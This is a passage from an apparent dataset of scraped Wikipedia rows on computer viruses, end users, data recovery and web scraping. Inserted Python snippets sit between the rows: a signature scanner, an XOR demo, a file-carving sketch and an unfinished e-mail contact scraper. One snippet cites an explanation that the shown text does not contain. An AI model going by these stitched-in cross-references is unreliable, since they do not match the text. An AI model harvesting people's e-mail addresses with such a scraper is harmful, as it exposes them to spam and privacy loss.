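    return [name for name, pattern in SIGNATURES.items() if pattern in data]

def scan_directory(directory: str) -> dict:
    """Scan every file under `directory`; map paths to any signature matches."""
    hits = {}
    for p in Path(directory).rglob("*"):
        if p.is_file():
            matches = scan_file(p)
            if matches:
                hits[str(p)] = matches
    return hits

# Example usage (the directory is a placeholder): print(scan_directory("./downloads"))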
Some websites—like Google subsidiary VirusTotal.com—allow users to upload one or more suspicious files to be scanned and checked by one or more antivirus programs in one operation. 110 111 Additionally, several capable antivirus software programs are available for free download from the Internet (usually restricted to non-commercial use). 112 Microsoft offers an optional free antivirus utility called Microsoft Security Essentials, a Windows Malicious Software Removal Tool that is updated as part of the regular Windows update regime, and an older optional anti-malware (malware removal) tool Windows Defender that has been upgraded to an antivirus product in Windows 8. Some viruses disable System Restore and other important Windows tools such as Task Manager and CMD. An example of a virus that does this is CiaDoor. Many such viruses can be removed by rebooting the computer, entering Windows "safe mode" with networking, and then using system tools or Microsoft Safety Scanner. 113 System Restore on Windows Me, Windows XP, Windows Vista and Windows 7 can restore the registry and critical system files to a previous checkpoint. Often a virus will cause a system to "hang" or "freeze", and a subsequent hard reboot will render a system restore point from the same day corrupted. Restore points from previous days should work, provided the virus is not designed to corrupt the restore files and does not exist in previous restore points. 114 115 Microsoft's System File Checker (improved in Windows 7 and later) can be used to check for, and repair, corrupted system files. 116 Restoring an earlier "clean" (virus-free) copy of the entire partition from a cloned disk, a disk image, or a backup copy is one solution—restoring an earlier backup disk "image" is relatively simple to do, usually removes any malware, and may be faster than "disinfecting" the computer—or reinstalling and reconfiguring the operating system and programs from scratch, as described below, then restoring user preferences. 107 Reinstalling the operating system is another approach to virus removal. It may be possible to recover copies of essential user data by booting from a live CD, or connecting the hard drive to another computer and booting from the second computer's operating system, taking great care not to infect that computer by executing any infected programs on the original drive. The original hard drive can then be reformatted and the OS and all programs installed from original media. Once the system has been restored, precautions must be taken to avoid reinfection from any restored executable files. 117 The first known description of a self-reproducing program in fiction is in the 1970 short story The Scarred Man by Gregory Benford which describes a computer program called VIRUS which, when installed on a computer with telephone modem dialing capability, randomly dials phone numbers until it hits a modem that is answered by another computer, and then attempts to program the answering computer with its own program, so that the second computer will also begin dialing random numbers, in search of yet another computer to program. The program rapidly spreads exponentially through susceptible computers and can only be countered by a second program called VACCINE. 118 His story was based on an actual computer virus written in FORTRAN that Benford had created and run on the lab computer in the 1960s, as a proof-of-concept, and which he told John Brunner about in 1970. 
119 The idea was explored further in two 1972 novels, When HARLIE Was One by David Gerrold and The Terminal Man by Michael Crichton, and became a major theme of the 1975 novel The Shockwave Rider by John Brunner. 120 The 1973 Michael Crichton sci-fi film Westworld made an early mention of the concept of a computer virus, being a central plot theme that causes androids to run amok. 121 better source needed Alan Oppenheimer's character summarizes the problem by stating that ...there's a clear pattern here which suggests an analogy to an infectious disease process, spreading from one...area to the next. To which the replies are stated: "Perhaps there are superficial similarities to disease" and, "I must confess I find it difficult to believe in a disease of machinery. 122 The term "virus" is also misused by extension to refer to other types of malware. "Malware" encompasses computer viruses along with many other forms of malicious software, such as computer "worms", ransomware, spyware, adware, trojan horses, keyloggers, rootkits, bootkits, malicious Browser Helper Object (BHOs), and other malicious software. The majority of active malware threats are trojan horse programs or computer worms rather than computer viruses. The term computer virus, coined by Fred Cohen in 1985, is a misnomer. 123 Viruses often perform some type of harmful activity on infected host computers, such as acquisition of hard disk space or central processing unit (CPU) time, accessing and stealing private information (e.g., credit card numbers, debit card numbers, phone numbers, names, email addresses, passwords, bank information, house addresses, etc.), corrupting data, displaying political, humorous or threatening messages on the user's screen, spamming their e-mail contacts, logging their keystrokes, or even rendering the computer useless. However, not all viruses carry a destructive "payload" and attempt to hide themselves—the defining characteristic of viruses is that they are self-replicating computer programs that modify other software without user consent by injecting themselves into the said programs, similar to a biological virus which replicates within living cells. |
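The single-byte XOR encoding mentioned earlier in this article, in which every byte is combined with a constant key so that the same operation both encodes and decodes, takes only a few lines to demonstrate. This is an illustration of why such "encryption" still leaves the small constant decoder as something a scanner can flag, not a recipe for anything.

def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a one-byte key; applying it twice restores the input."""
    return bytes(b ^ key for b in data)

plaintext = b"exclusive-or is its own inverse"
encoded = xor_bytes(plaintext, 0x5A)
decoded = xor_bytes(encoded, 0x5A)

print(encoded)                   # unreadable bytes
print(decoded)                   # b'exclusive-or is its own inverse'
assert decoded == plaintext      # the same operation undoes itself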
656 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/End-user_(computer_science) | In product development, an end user (sometimes end-user) a is a person who ultimately uses or is intended to ultimately use a product. 1 2 3 The end user stands in contrast to users who support or maintain the product, 4 such as sysops, system administrators, database administrators, 5 information technology (IT) experts, software professionals, and computer technicians. End users typically do not possess the technical understanding or skill of the product designers, 6 a fact easily overlooked and forgotten by designers: leading to features creating low customer satisfaction. 2 In information technology, end users are not customers in the usual sense—they are typically employees of the customer. 7 For example, if a large retail corporation buys a software package for its employees to use, even though the large retail corporation was the customer that purchased the software, the end users are the employees of the company, who will use the software at work. End users are one of the three major factors contributing to the complexity of managing information systems. The end user's position has changed from a position in the 1950s (where end users did not interact with the mainframe; computer experts programmed and ran the mainframe) to one in the 2010s where the end user collaborates with and advises the management information system and Information Technology department about his or her needs regarding the system or product. This raises new questions, such as: Who manages each resource?, What is the role of the MIS Department? and What is the optimal relationship between the end-user and the MIS Department? 8 The concept of end-user first surfaced in the late 1980s and has since then raised many debates. One challenge was the goal to give both the user more freedom, by adding advanced features and functions (for more advanced users) and adding more constraints (to prevent a neophyte user from accidentally erasing an entire company's database). 9 This phenomenon appeared as a consequence of consumerization of computer products and software. In the 1960s and 1970s, computer users were generally programming experts and computer scientists. However, in the 1980s, and especially in the mid-to-late 1990s and the early 2000s, everyday, regular people began using computer devices and software for personal and work use. IT specialists needed to cope with this trend in various ways. In the 2010s, users now want to have more control over the systems they operate, to solve their own problems, and be able to customize the systems to suit their needs. The apparent drawbacks were the risk of corruption of the systems and data the users had control of, due to their lack of knowledge on how to properly operate the computer software at an advanced level. 10 For companies to appeal to the user, it took primary care to accommodate and think of end-users in their new products, software launches, and updates. A partnership needed to be formed between the programmer-developers and the everyday end users so both parties could maximize the use of the products effectively. 11 A major example of the public's effects on end user's requirements were the public libraries. They have been affected by new technologies in many ways, ranging from the digitalization of their card catalog, the shift to e-books, e-journals, and offering online services. 
Libraries have had to undergo many changes in order to cope, 12 including training existing librarians in Web 2.0 and database skills, to hiring IT and software experts. The aim of end user documentation (e.g., manuals and guidebooks for products) is to help the user understand certain aspects of the systems and to provide all the answers in one place. 13 A lot of documentation is available for users to help them understand and properly use a certain product or service. Due to the fact that the information available is usually very vast, inconsistent or ambiguous (e.g., a user manual with hundreds of pages, including guidance on using advanced features), many users suffer from an information overload. Therefore, they become unable to take the right course of action. This needs to be kept in mind when developing products and services and the necessary documentation for them. 14 Well-written documentation is needed for a user to reference. Some key aspects of such a documentation are: 13 At times users do not refer to the documentation available to them due to various reasons, ranging from finding the manual too large or due to not understanding the jargon and acronyms it contains. In other cases, the users may find that the manual makes too many assumptions about a user having pre-existing knowledge of computers and software, and thus the directions may skip over these initial steps (from the users' point of view). Thus, frustrated user may report false problems because of their inability to understand the software or computer hardware. This in turn causes the company to focus on perceived problems instead of focusing on the actual problems of the software. 15 In the 2010s, there is a lot of emphasis on user's security and privacy. With the increasing role that computers are playing in people's lives, people are carrying laptops and smartphones with them and using them for scheduling appointments, making online purchases using credit cards and searching for information. These activities can potentially be observed by companies, governments or individuals, which can lead to breaches of privacy, identity theft, by, blackmailing and other serious concerns. As well, many businesses, ranging from small business startups to huge corporations are using computers and software to design, manufacture, market and sell their products and services, and businesses also use computers and software in their back office processes (e.g., human resources, payroll, etc.). As such, it is important for people and organizations to need know that the information and data they are storing, using, or sending over computer networks or storing on computer systems is secure. However, developers of software and hardware are faced with many challenges in developing a system that can be both user friendly, accessible 24 7 on almost any device and be truly secure. Security leaks happen, even to individuals and organizations that have security measures in place to protect their data and information (e.g., firewalls, encryption, strong passwords). The complexities of creating such a secure system come from the fact that the behaviour of humans is not always rational or predictable. Even in a very-well secured computer system, a malicious individual can telephone a worker and pretend to be a private investigator working for the software company, and ask for the individual's password, a dishonest process called phishing. 
As well, even with a well-secured system, if a worker decides to put the company's electronic files on a USB drive to take them home to work on them over the weekend (against many companies' policies), and then loses this USB drive, the company's data may be compromised. Therefore, developers need to make systems that are intuitive to the user in order to have information security and system security. 16 Another key step to end user security is informing people and employees about the security threats and what they can do to avoid them or protect themselves and the organization. Clearly underlining the capabilities and risks makes users more aware and informed whilst they are using the products. A number of situations could put the user at risk. Even if the security measures in place are strong, the choices the user makes and his or her behavior have a major impact on how secure their information really is. Therefore, an informed user is one who can protect and achieve the best security out of the system they use. 17 Because of the importance of end-user security and the impact it can have on organizations, the UK government set out guidance for the public sector to help civil servants learn how to be more security aware when using government networks and computers. While this is targeted at a certain sector, this type of educational effort can be informative to any type of user. This helps developers meet security norms and end users be aware of the risks involved. 18 Reimers and Andersson have conducted a number of studies on end-user security habits and found that the same type of repeated education and training in security best practices can have a marked effect on the perception of compliance with good end-user network security habits, especially concerning malware and ransomware. 19 In end-user license agreements, the end user is distinguished from the value-added reseller who installs the software, or the organization that purchases and manages the software. 20 Certain American defense-related products and information require export approval from the United States Government under the International Traffic in Arms Regulations and Export Administration Regulations. 21 In order to obtain a license to export, the exporter must specify both the end user and the end use by undertaking an end-user certificate. 22 In the UK, there exist documents that accompany licenses for products named in the end user undertaking statements. 23 |
658 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_recovery | In computing, data recovery is a process of retrieving deleted, inaccessible, lost, corrupted, damaged, or formatted data from secondary storage, removable media or files, when the data stored in them cannot be accessed in a usual way. 1 The data is most often salvaged from storage media such as internal or external hard disk drives (HDDs), solid-state drives (SSDs), USB flash drives, magnetic tapes, CDs, DVDs, RAID subsystems, and other electronic devices. Recovery may be required due to physical damage to the storage devices or logical damage to the file system that prevents it from being mounted by the host operating system (OS). 2 Logical failures occur when the hard drive devices are functional but the user or automated-OS cannot retrieve or access data stored on them. Logical failures can occur due to corruption of the engineering chip, lost partitions, firmware failure, or failures during formatting re-installation. 3 4 Data recovery can be a very simple or technical challenge. This is why there are specific software companies specialized in this field. 5 The most common data recovery scenarios involve an operating system failure, malfunction of a storage device, logical failure of storage devices, accidental damage or deletion, etc. (typically, on a single-drive, single-partition, single-OS system), in which case the ultimate goal is simply to copy all important files from the damaged media to another new drive. This can be accomplished using a Live CD, or DVD by booting directly from a ROM or a USB drive instead of the corrupted drive in question. Many Live CDs or DVDs provide a means to mount the system drive and backup drives or removable media, and to move the files from the system drive to the backup media with a file manager or optical disc authoring software. Such cases can often be mitigated by disk partitioning and consistently storing valuable data files (or copies of them) on a different partition from the replaceable OS system files. Another scenario involves a drive-level failure, such as a compromised file system or drive partition, or a hard disk drive failure. In any of these cases, the data is not easily read from the media devices. Depending on the situation, solutions involve repairing the logical file system, partition table, or master boot record, or updating the firmware or drive recovery techniques ranging from software-based recovery of corrupted data, to hardware- and software-based recovery of damaged service areas (also known as the hard disk drive's "firmware"), to hardware replacement on a physically damaged drive which allows for the extraction of data to a new drive. If a drive recovery is necessary, the drive itself has typically failed permanently, and the focus is rather on a one-time recovery, salvaging whatever data can be read. In a third scenario, files have been accidentally "deleted" from a storage medium by the users. Typically, the contents of deleted files are not removed immediately from the physical drive; instead, references to them in the directory structure are removed, and thereafter space the deleted data occupy is made available for later data overwriting. In the mind of end users, deleted files cannot be discoverable through a standard file manager, but the deleted data still technically exists on the physical drive. 
In the meantime, the original file contents remain, often several disconnected fragments, and may be recoverable if not overwritten by other data files. The term "data recovery" is also used in the context of forensic applications or espionage, where data which have been encrypted, hidden, or deleted, rather than damaged, are recovered. Sometimes data present in the computer gets encrypted or hidden due to reasons like virus attacks which can only be recovered by some computer forensic experts. A wide variety of failures can cause physical damage to storage media, which may result from human errors and natural disasters. CD-ROMs can have their metallic substrate or dye layer scratched off; hard disks can suffer from a multitude of mechanical failures, such as head crashes, PCB failure, and failed motors; tapes can simply break. Physical damage to a hard drive, even in cases where a head crash has occurred, does not necessarily mean there will be a permanent loss of data. The techniques employed by many professional data recovery companies can typically salvage most, if not all, of the data that had been lost when the failure occurred. Of course, there are exceptions to this, such as cases where severe damage to the hard drive platters may have occurred. However, if the hard drive can be repaired and a full image or clone created, then the logical file structure can be rebuilt in most instances. Most physical damage cannot be repaired by end users. For example, opening a hard disk drive in a normal environment can allow airborne dust to settle on the platter and become caught between the platter and the read write head. During normal operation, read write heads float 3 to 6 nanometers above the platter surface, and the average dust particles found in a normal environment are typically around 30,000 nanometers in diameter. 6 When these dust particles get caught between the read write heads and the platter, they can cause new head crashes that further damage the platter and thus compromise the recovery process. Furthermore, end users generally do not have the hardware or technical expertise required to make these repairs. Consequently, data recovery companies are often employed to salvage important data with the more reputable ones using class 100 dust- and static-free cleanrooms. 7 Recovering data from physically damaged hardware can involve multiple techniques. Some damage can be repaired by replacing parts in the hard disk. This alone may make the disk usable, but there may still be logical damage. A specialized disk-imaging procedure is used to recover every readable bit from the surface. Once this image is acquired and saved on a reliable medium, the image can be safely analyzed for logical damage and will possibly allow much of the original file system to be reconstructed. A common misconception is that a damaged printed circuit board (PCB) may be simply replaced during recovery procedures by an identical PCB from a healthy drive. While this may work in rare circumstances on hard disk drives manufactured before 2003, it will not work on newer drives. Electronics boards of modern drives usually contain drive-specific adaptation data (generally a map of bad sectors and tuning parameters) and other information required to properly access data on the drive. Replacement boards often need this information to effectively recover all of the data. The replacement board may need to be reprogrammed. 
Some manufacturers (Seagate, for example) store this information on a serial EEPROM chip, which can be removed and transferred to the replacement board. 8 9 Each hard disk drive has what is called a system area or service area; this portion of the drive, which is not directly accessible to the end user, usually contains drive's firmware and adaptive data that helps the drive operate within normal parameters. 10 One function of the system area is to log defective sectors within the drive; essentially telling the drive where it can and cannot write data. The sector lists are also stored on various chips attached to the PCB, and they are unique to each hard disk drive. If the data on the PCB do not match what is stored on the platter, then the drive will not calibrate properly. 11 In most cases the drive heads will click because they are unable to find the data matching what is stored on the PCB. The term "logical damage" refers to situations in which the error is not a problem in the hardware and requires software-level solutions. In some cases, data on a hard disk drive can be unreadable due to damage to the partition table or file system, or to (intermittent) media errors. In the majority of these cases, at least a portion of the original data can be recovered by repairing the damaged partition table or file system using specialized data recovery software such as Testdisk; software like ddrescue can image media despite intermittent errors, and image raw data when there is partition table or file system damage. This type of data recovery can be performed by people without expertise in drive hardware as it requires no special physical equipment or access to platters. Sometimes data can be recovered using relatively simple methods and tools; 12 more serious cases can require expert intervention, particularly if parts of files are irrecoverable. Data carving is the recovery of parts of damaged files using knowledge of their structure. After data has been physically overwritten on a hard disk drive, it is generally assumed that the previous data are no longer possible to recover. In 1996, Peter Gutmann, a computer scientist, presented a paper that suggested overwritten data could be recovered through the use of magnetic force microscopy. 13 In 2001, he presented another paper on a similar topic. 14 To guard against this type of data recovery, Gutmann and Colin Plumb designed a method of irreversibly scrubbing data, known as the Gutmann method and used by several disk-scrubbing software packages. Substantial criticism has followed, primarily dealing with the lack of any concrete examples of significant amounts of overwritten data being recovered. 15 Although Gutmann's theory may be correct, there is no practical evidence that overwritten data can be recovered, while research has shown to support that overwritten data cannot be recovered. specify 16 17 18 Solid-state drives (SSD) overwrite data differently from hard disk drives (HDD) which makes at least some of their data easier to recover. Most SSDs use flash memory to store data in pages and blocks, referenced by logical block addresses (LBA) which are managed by the flash translation layer (FTL). When the FTL modifies a sector it writes the new data to another location and updates the map so the new data appear at the target LBA. This leaves the pre-modification data in place, with possibly many generations, and recoverable by data recovery software. Sometimes, data present in the physical drives (Internal External Hard disk, Pen Drive, etc.) 
gets lost, deleted, or formatted due to circumstances like a virus attack, accidental deletion, or accidental use of Shift+Delete. In these cases, data recovery software is used to recover or restore the data files. Among the logical failures of hard disks, a logical bad sector is the most common fault that leaves data unreadable. Sometimes it is possible to sidestep error detection even in software and, perhaps with repeated reading and statistical analysis, recover at least some of the underlying stored data. Sometimes prior knowledge of the data stored and the error detection and correction codes can be used to recover even erroneous data. However, if the underlying physical drive is degraded badly enough, at least the hardware surrounding the data must be replaced, or it might even be necessary to apply laboratory techniques to the physical recording medium. Each of these approaches is progressively more expensive, and as such progressively more rarely sought. Eventually, if the physical storage medium has indeed been disturbed badly enough, recovery will not be possible using any means; the information has been irreversibly lost. Recovery experts do not always need physical access to the damaged hardware. When the lost data can be recovered by software techniques, they can often perform the recovery using remote access software over the Internet, LAN, or another connection to the physical location of the damaged media. The process is essentially no different from what the end user could perform by themselves. 19 Remote recovery requires a stable connection with adequate bandwidth. However, it is not applicable where access to the hardware is required, as in cases of physical damage. Usually, there are four phases to successful data recovery, though that can vary depending on the type of data corruption and recovery required. 20 The Windows operating system can be reinstalled on a computer that is already licensed for it. The reinstallation can be done by downloading the operating system or by using a "restore disk" provided by the computer manufacturer. Eric Lundgren was fined and sentenced to U.S. federal prison in April 2018 for producing 28,000 restore disks and intending to distribute them for about 25 cents each as a convenience to computer repair shops. 21 Data recovery cannot always be done on a running system. As a result, a boot disk, live CD, live USB, or any other type of live distro containing a minimal operating system is used. |
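The data-recovery row above mentions data carving, recovering parts of files from their known structure rather than from file-system metadata. The code below is only a minimal sketch of that idea, assuming a hypothetical raw image file named disk.img and searching only for JPEG start and end markers; real carving tools handle fragmentation and many more formats.

import re

# Minimal, illustrative file-carving sketch: scan a raw disk image for JPEG
# start (FF D8 FF) and end (FF D9) markers and save each candidate file.
# 'disk.img' is a hypothetical image path used only for illustration.
def carve_jpegs(image_path="disk.img", out_prefix="carved"):
    with open(image_path, "rb") as f:
        data = f.read()  # fine for small images; real tools stream in chunks
    count = 0
    for match in re.finditer(b"\xff\xd8\xff", data):
        start = match.start()
        end = data.find(b"\xff\xd9", start)
        if end == -1:
            break
        with open(f"{out_prefix}_{count}.jpg", "wb") as out:
            out.write(data[start:end + 2])  # include the 2-byte end marker
        count += 1
    return count

# Example usage (uncomment once a real image file exists):
# print(carve_jpegs("disk.img"))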
659 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-22 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
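The web-scraping row above describes a "simple yet powerful" approach based on HTTP requests plus regular-expression matching, and mentions contact scraping as a typical use. The sketch below illustrates that idea in Python; the URL and the e-mail pattern are placeholders for illustration, not taken from the scraped article.

import re
import requests

# Minimal sketch of regex-based extraction: fetch a page and pull out
# anything that looks like an e-mail address (contact scraping).
# The URL below is a placeholder used only for illustration.
def scrape_emails(url="https://example.com"):
    try:
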